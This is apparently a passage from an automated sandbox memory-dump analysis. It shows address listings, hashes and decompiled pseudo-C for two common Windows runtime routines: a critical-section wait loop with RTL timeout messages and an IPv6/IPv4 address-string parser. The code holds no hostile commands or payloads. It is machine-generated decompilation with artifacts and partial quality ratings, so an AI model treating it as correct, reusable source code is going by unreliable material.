                                          0x02382386
                                          0x02382389
                                          0x0238238e
                                          0x02382390
                                          0x02345378
                                          0x0234537c
                                          0x02382396
                                          0x02382396
                                          0x02382397
                                          0x0238239c
                                          0x023823a2
                                          0x023823a3
                                          0x023823a6
                                          0x023823ab
                                          0x023823ad
                                          0x00000000
                                          0x023823b3
                                          0x023823b3
                                          0x023823b4
                                          0x023823b9
                                          0x023823ba
                                          0x023823ba
                                          0x023823bc
                                          0x023823bf
                                          0x00000000
                                          0x00000000
                                          0x02379153
                                          0x02379158
                                          0x0237915a
                                          0x0237915e
                                          0x02379160
                                          0x00000000
                                          0x02379166
                                          0x02379166
                                          0x02379171
                                          0x02379176
                                          0x02379176
                                          0x00000000
                                          0x02379160
                                          0x023823c6
                                          0x023823cb
                                          0x023823d7
                                          0x023823d7
                                          0x023823ad
                                          0x02382390
                                          0x02382373
                                          0x0238233f
                                          0x0238233f
                                          0x00000000
                                          0x0238233f
                                          0x02382291
                                          0x02382291
                                          0x02382293
                                          0x02382295
                                          0x0238229a
                                          0x023822a1
                                          0x023822a3
                                          0x023822a7
                                          0x023822a9
                                          0x00000000
                                          0x00000000
                                          0x023822ab
                                          0x023822ad
                                          0x023822af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822af
                                          0x023822b1
                                          0x023822b4
                                          0x023822b4
                                          0x023822b6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822b6
                                          0x0238228f
                                          0x00000000
                                          0x0238226d
                                          0x023453cb
                                          0x023453ce
                                          0x023453d0
                                          0x023453d4
                                          0x023453d6
                                          0x00000000
                                          0x023453d8
                                          0x023453e3
                                          0x023453ea
                                          0x023453ea
                                          0x023453d6
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023822F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023822FC
                                          • RTL: Resource at %p, xrefs: 0238230B
                                          • RTL: Re-Waiting, xrefs: 02382328
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 094c5c7d61cd5d77c85b80c872953c697b42e9ea81d68e6073800c5ac0ba82cd
                                          • Instruction ID: 512a6f3cd010944609429b5a8ce9b33600621023b06b277a7cc9f10469c3cee0
                                          • Opcode Fuzzy Hash: 094c5c7d61cd5d77c85b80c872953c697b42e9ea81d68e6073800c5ac0ba82cd
                                          • Instruction Fuzzy Hash: 9351D4716017156BEB25AB28CC80FA773EDEF58724F114269FD09DF284EB61E8418FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0234EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E0234EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0233DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x240793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E023216C0(_t39);
				} else {
					_t40 = E0231F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02363915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E023201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x240793c; // 0x0
								_push(_t85);
								_t44 = E02321F28(_t71);
							} else {
								_t44 = E0231F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02363915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E023A2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0234EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02364FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02373F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02373F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x24020c0;
								if(_t85 != 0x24020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E023A217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02373F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                          0x0234ec56
                                          0x0234ec56
                                          0x0234ec56
                                          0x0234ec5c
                                          0x0234ec64
                                          0x023823e6
                                          0x023823eb
                                          0x023823eb
                                          0x0234ec6a
                                          0x0234ec6c
                                          0x0234ec6f
                                          0x023823f3
                                          0x023823f8
                                          0x023823fa
                                          0x023823fc
                                          0x0234ec75
                                          0x0234ec76
                                          0x0234ec76
                                          0x0234ec7b
                                          0x0234ec7c
                                          0x0234ec7e
                                          0x02382406
                                          0x02382407
                                          0x0238240c
                                          0x0238240d
                                          0x0238240d
                                          0x0238240d
                                          0x02382414
                                          0x02382417
                                          0x0238241e
                                          0x02382435
                                          0x02382438
                                          0x0238243c
                                          0x0238243f
                                          0x02382442
                                          0x02382443
                                          0x02382446
                                          0x02382449
                                          0x02382453
                                          0x02382455
                                          0x0238245b
                                          0x0238245b
                                          0x0234eb99
                                          0x0234eb99
                                          0x0234eb9c
                                          0x0234eb9d
                                          0x0234eb9f
                                          0x0234eba2
                                          0x02382465
                                          0x0238246b
                                          0x0238246d
                                          0x0234eba8
                                          0x0234eba9
                                          0x0234eba9
                                          0x0234ebae
                                          0x0234ebb3
                                          0x0234ebb9
                                          0x0234ebbb
                                          0x02382513
                                          0x02382514
                                          0x02382519
                                          0x0238251b
                                          0x0234ec2a
                                          0x0234ec2d
                                          0x0234ec33
                                          0x0234ec36
                                          0x0234ec3a
                                          0x0234ec3e
                                          0x0234ec40
                                          0x0234ec47
                                          0x0234ec47
                                          0x0234ec40
                                          0x023222c6
                                          0x0234ebc1
                                          0x0234ebc1
                                          0x0234ebc5
                                          0x0234ec9a
                                          0x0234ec9a
                                          0x0234ebd6
                                          0x0234ebd6
                                          0x00000000
                                          0x0234ebbb
                                          0x02382477
                                          0x0238247c
                                          0x02382486
                                          0x0238248b
                                          0x02382496
                                          0x0238249b
                                          0x0238249d
                                          0x023824a0
                                          0x023824a3
                                          0x023824aa
                                          0x023824aa
                                          0x023824a5
                                          0x023824a5
                                          0x023824a5
                                          0x023824ac
                                          0x023824af
                                          0x023824b0
                                          0x023824b3
                                          0x023824b9
                                          0x023824ba
                                          0x023824bb
                                          0x023824c6
                                          0x023824cb
                                          0x023824cd
                                          0x023824d0
                                          0x023824d1
                                          0x023824d4
                                          0x023824d6
                                          0x023824d9
                                          0x023824d9
                                          0x023824dc
                                          0x023824df
                                          0x023824e1
                                          0x023824e7
                                          0x023824e9
                                          0x023824ec
                                          0x023824ef
                                          0x023824f2
                                          0x023824f2
                                          0x023824ef
                                          0x023824e7
                                          0x023824fa
                                          0x023824ff
                                          0x02382501
                                          0x02382503
                                          0x02382506
                                          0x0238250b
                                          0x0234eb8c
                                          0x0234eb93
                                          0x00000000
                                          0x00000000
                                          0x0234eb93
                                          0x00000000
                                          0x0234eb99
                                          0x0234ec85
                                          0x0234ec85
                                          0x0234ec85
                                          0x00000000

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 023824FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023824BD
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0238248D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 3c28af1236c6febe3e9839c6631d7fd9121c365cb2437b4744980b2824b2ed1d
                                          • Instruction ID: 7675d3f72823586c598ef58d822af951a2382f82dd510b51478230daa2e2b524
                                          • Opcode Fuzzy Hash: 3c28af1236c6febe3e9839c6631d7fd9121c365cb2437b4744980b2824b2ed1d
                                          • Instruction Fuzzy Hash: F741D270A00304ABDB34EB68CC89FAB77E9EF44720F208655F9559B6C1D774E941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0235FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0235FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0235EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0235EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0235685D(_t167, 4) == 0) {
								if(E0235685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0235685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0235685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02338980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0232DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0235EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0235EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                          0x0235fcd1
                                          0x0235fcd6
                                          0x0235fcd9
                                          0x0235fcdc
                                          0x0235fcdf
                                          0x0235fce2
                                          0x0235fce5
                                          0x0235fce8
                                          0x0235fceb
                                          0x0235fced
                                          0x0235fced
                                          0x0235fcf3
                                          0x00000000
                                          0x00000000
                                          0x0235fcfc
                                          0x0235fcfe
                                          0x0235fdc1
                                          0x0238ecbd
                                          0x00000000
                                          0x0238eccc
                                          0x0238eccc
                                          0x0238ecd2
                                          0x00000000
                                          0x00000000
                                          0x0238ecdf
                                          0x0238ece0
                                          0x0238ece4
                                          0x0238eceb
                                          0x0238ecee
                                          0x0238eca8
                                          0x0238eca8
                                          0x0238ecaa
                                          0x0235fd76
                                          0x0235fd79
                                          0x0235fdb4
                                          0x0235fdb5
                                          0x0235fdb6
                                          0x00000000
                                          0x0235fdb6
                                          0x0235fd7e
                                          0x0238ecfc
                                          0x0235fe2f
                                          0x00000000
                                          0x0235fe2f
                                          0x0238ed08
                                          0x0238ed0f
                                          0x0238ed17
                                          0x0238ed1b
                                          0x00000000
                                          0x0238ed1b
                                          0x0235fd88
                                          0x00000000
                                          0x00000000
                                          0x0235fd94
                                          0x0235fd99
                                          0x0235fda1
                                          0x00000000
                                          0x00000000
                                          0x0235fdb0
                                          0x00000000
                                          0x0235fdb0
                                          0x0238ecbd
                                          0x0235fdc7
                                          0x0235fdcb
                                          0x00000000
                                          0x0235fdd7
                                          0x0235fde3
                                          0x0235fe06
                                          0x02371fe7
                                          0x00000000
                                          0x00000000
                                          0x02371fef
                                          0x02371ff0
                                          0x02371ff4
                                          0x02371ff7
                                          0x02371ffa
                                          0x02371ffd
                                          0x02372000
                                          0x00000000
                                          0x00000000
                                          0x0238ecf1
                                          0x00000000
                                          0x0238ecf1
                                          0x00000000
                                          0x0235fe06
                                          0x0235fde8
                                          0x0235fdec
                                          0x0235fdef
                                          0x0235fdf2
                                          0x00000000
                                          0x0235fdf2
                                          0x0235fdcb
                                          0x0235fd04
                                          0x0235fd05
                                          0x0238ec67
                                          0x00000000
                                          0x00000000
                                          0x0238ec6f
                                          0x00000000
                                          0x0238ec6f
                                          0x0235fd13
                                          0x0235fd3c
                                          0x0235fd40
                                          0x0238ec75
                                          0x0238ec7a
                                          0x00000000
                                          0x0238ec8a
                                          0x0238ec8a
                                          0x0238ec90
                                          0x0238ecb2
                                          0x0235fd73
                                          0x0235fd73
                                          0x00000000
                                          0x0235fd73
                                          0x0238ec95
                                          0x00000000
                                          0x00000000
                                          0x0238eca1
                                          0x0238eca4
                                          0x0238eca5
                                          0x00000000
                                          0x0238eca5
                                          0x0238ec7a
                                          0x0235fd4a
                                          0x00000000
                                          0x0235fd6e
                                          0x0235fd6e
                                          0x0235fd71
                                          0x00000000
                                          0x0235fd71
                                          0x0235fd4a
                                          0x0235fd21
                                          0x0236a3a1
                                          0x00000000
                                          0x0236a3a1
                                          0x0235fd36
                                          0x0237200b
                                          0x02372012
                                          0x00000000
                                          0x00000000
                                          0x02372018
                                          0x00000000
                                          0x02372018
                                          0x00000000
                                          0x0235fd36
                                          0x0235fe0f
                                          0x0235fe16
                                          0x0236a3ad
                                          0x00000000
                                          0x00000000
                                          0x0236a3b3
                                          0x0236a3b3
                                          0x0235fe1f
                                          0x0238ed25
                                          0x0238ed86
                                          0x00000000
                                          0x00000000
                                          0x0238ed91
                                          0x0238ed95
                                          0x0238ed95
                                          0x0238ed9a
                                          0x0238edad
                                          0x0238edb3
                                          0x0238edba
                                          0x0238edc4
                                          0x0238edc9
                                          0x00000000
                                          0x0238edcc
                                          0x0238ed2a
                                          0x0238ed55
                                          0x00000000
                                          0x00000000
                                          0x0238ed61
                                          0x0238ed66
                                          0x0238ed6e
                                          0x00000000
                                          0x00000000
                                          0x0238ed7d
                                          0x00000000
                                          0x0238ed7d
                                          0x0238ed30
                                          0x00000000
                                          0x00000000
                                          0x0238ed3c
                                          0x0238ed43
                                          0x0238ed4b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: a1a918c68e92306350ff36486ec2abf3bdd3b3c50b46d914ac3967f5ff45bfea
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: D791B231D00229EFDF24DF58C845BAEB7F8FF46709F20846AD809AB552E7305A45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%